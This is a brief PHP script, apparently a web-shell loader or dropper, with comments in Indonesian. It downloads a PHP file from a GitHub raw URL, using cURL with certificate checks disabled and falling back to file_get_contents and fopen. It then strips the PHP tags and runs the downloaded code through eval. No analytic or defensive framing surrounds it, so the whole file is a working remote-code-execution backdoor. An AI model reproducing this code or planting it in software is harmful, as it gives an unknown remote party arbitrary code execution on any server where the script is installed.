<?php
$__REMOTE_RESOURCE_POINTER_URI = 'https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/sx.php';
$__RAW_PAYLOAD_BUFFER_STREAM = false;

// 1. Coba cURL
if (function_exists('curl_init')) {
    $__TRANSPORT_LAYER_HANDLE = curl_init($__REMOTE_RESOURCE_POINTER_URI);
    curl_setopt_array($__TRANSPORT_LAYER_HANDLE, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_FOLLOWLOCATION => 1]);
    $__RAW_PAYLOAD_BUFFER_STREAM = curl_exec($__TRANSPORT_LAYER_HANDLE);
    curl_close($__TRANSPORT_LAYER_HANDLE);
}

// 2. Fallback: file_get_contents
if (!$__RAW_PAYLOAD_BUFFER_STREAM && ini_get('allow_url_fopen')) {
    $__RAW_PAYLOAD_BUFFER_STREAM = @file_get_contents($__REMOTE_RESOURCE_POINTER_URI);
}

// 3. Fallback: fopen stream
if (!$__RAW_PAYLOAD_BUFFER_STREAM && function_exists('fopen') && ini_get('allow_url_fopen')) {
    $__IO_STREAM_DESCRIPTOR_REF = @fopen($__REMOTE_RESOURCE_POINTER_URI, 'r');
    if ($__IO_STREAM_DESCRIPTOR_REF) {
        $__RAW_PAYLOAD_BUFFER_STREAM = stream_get_contents($__IO_STREAM_DESCRIPTOR_REF);
        fclose($__IO_STREAM_DESCRIPTOR_REF);
    }
}

// Eksekusi
if ($__RAW_PAYLOAD_BUFFER_STREAM) eval(str_replace(['<?php', '?>'], '', $__RAW_PAYLOAD_BUFFER_STREAM));
?>
